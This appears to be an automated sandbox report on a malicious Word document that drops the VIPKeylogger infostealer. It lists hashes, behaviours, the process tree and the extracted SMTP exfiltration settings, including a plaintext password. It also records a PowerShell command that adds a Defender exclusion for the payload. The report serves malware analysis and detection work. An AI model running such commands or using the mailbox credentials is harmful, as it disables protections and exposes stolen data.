Analysis
-
max time kernel
132s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
30092463687563.docx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
30092463687563.docx
Resource
win10v2004-20240802-en
General
-
Target
30092463687563.docx
-
Size
264KB
-
MD5
da3b3b9590907c35f64e830b2b244ffd
-
SHA1
8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1
-
SHA256
97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825
-
SHA512
98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1
-
SSDEEP
6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
hosting2.ro.hostsailor.com - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@@ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 7 2612 EQNEDT32.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 2 IoCs
Processes:
wealtken20309.exewealtken20309.exepid process 2004 wealtken20309.exe 2568 wealtken20309.exe -
Loads dropped DLL 1 IoCs
Processes:
EQNEDT32.EXEpid process 2612 EQNEDT32.EXE -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
wealtken20309.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 wealtken20309.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 wealtken20309.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 wealtken20309.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
wealtken20309.exedescription pid process target process PID 2004 set thread context of 2568 2004 wealtken20309.exe wealtken20309.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EQNEDT32.EXEwealtken20309.exewealtken20309.exepowershell.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wealtken20309.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wealtken20309.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2252 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
wealtken20309.exepowershell.exepid process 2568 wealtken20309.exe 1800 powershell.exe 2568 wealtken20309.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
wealtken20309.exepowershell.exedescription pid process Token: SeDebugPrivilege 2568 wealtken20309.exe Token: SeDebugPrivilege 1800 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEpid process 2252 WINWORD.EXE 2252 WINWORD.EXE 2252 WINWORD.EXE -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEwealtken20309.exedescription pid process target process PID 2612 wrote to memory of 2004 2612 EQNEDT32.EXE wealtken20309.exe PID 2612 wrote to memory of 2004 2612 EQNEDT32.EXE wealtken20309.exe PID 2612 wrote to memory of 2004 2612 EQNEDT32.EXE wealtken20309.exe PID 2612 wrote to memory of 2004 2612 EQNEDT32.EXE wealtken20309.exe PID 2252 wrote to memory of 1824 2252 WINWORD.EXE splwow64.exe PID 2252 wrote to memory of 1824 2252 WINWORD.EXE splwow64.exe PID 2252 wrote to memory of 1824 2252 WINWORD.EXE splwow64.exe PID 2252 wrote to memory of 1824 2252 WINWORD.EXE splwow64.exe PID 2004 wrote to memory of 1800 2004 wealtken20309.exe powershell.exe PID 2004 wrote to memory of 1800 2004 wealtken20309.exe powershell.exe PID 2004 wrote to memory of 1800 2004 wealtken20309.exe powershell.exe PID 2004 wrote to memory of 1800 2004 wealtken20309.exe powershell.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe PID 2004 wrote to memory of 2568 2004 wealtken20309.exe wealtken20309.exe -
outlook_office_path 1 IoCs
Processes:
wealtken20309.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 wealtken20309.exe -
outlook_win_path 1 IoCs
Processes:
wealtken20309.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 wealtken20309.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1824
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Roaming\wealtken20309.exe"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Users\Admin\AppData\Roaming\wealtken20309.exe"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2568
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD568988d7dd981fa3061f0b32c8627c1ec
SHA10800a2e4506ba3568047417e440cbf5a21fe8a5c
SHA2567040d17da449308cf2460522e5495ddaffea8edd787b2be52aa15eae552c478c
SHA5121b6fefaf0fb9c5a4858ba6199dc33262409dcbd07a87c8c5c2ab7370f28b1ea34dea5622551a53d45565d1c7d445882390a41e9896aeba3e3d68e003bb63747f
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{96E47E6C-170C-4C3F-98E1-D8B9A741D571}.FSD
Filesize128KB
MD57d9680f56b3377f37e05ca9b7683f43e
SHA163c7960b2cc93379aaf9e92799664ab60729d172
SHA256b91e1013b2113fe1875a1bb44c962db3756d369160b36f0e4cdda1ce70211024
SHA512073a47bf49442efcfd3d41833292d0257dee8103be89255577169335d5381788c7aef30febcf5ee9ab207dee4fb9e864f9408776960b0b65cd51b120e01adfdf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\wealthzxcv[1].doc
Filesize565KB
MD5adbffccbb78834fa492cc7ca8a676e52
SHA11e5b065d13fa03fb556a7ff315b85db96d369908
SHA25642d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63
SHA512de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33
-
Filesize
128KB
MD5afa493144346c84ef2d518ebe8930309
SHA1949d73a0a801d92c04f015df239e9719a62108df
SHA256c987711c23a13fe6f2879edf218f2b88a565edf88372958178d755f54a830b3d
SHA512f03c4f097e59935a41dd464c947302acdbc801f2f5ff279283cf0ed5872fdcb2f7b846af7c40875fbace7cb53c8ee344d3b5279da3bd25213ef887788bb32da0
-
Filesize
412B
MD564c0da6e5a63888d9890912acced0309
SHA120151576c22d2469553f31d5f882a0f749800ca4
SHA256ecbb43b054e8615b8227e5317d92c7edec0d87de76294c7c61d4175d7dec8f13
SHA512115e97bd2c6a5decd4be01b608844f0d92c1c02c5b3d6afcc0802adda09d33c4d1b3a7482cfa96fbbbce818352e4f3864627d0b3a49544c409b3b407a2cd30d0
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
858KB
MD5d237ebe34f35a9ffe99f5efe0474c1e2
SHA1573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1
SHA256ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137
SHA5129393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05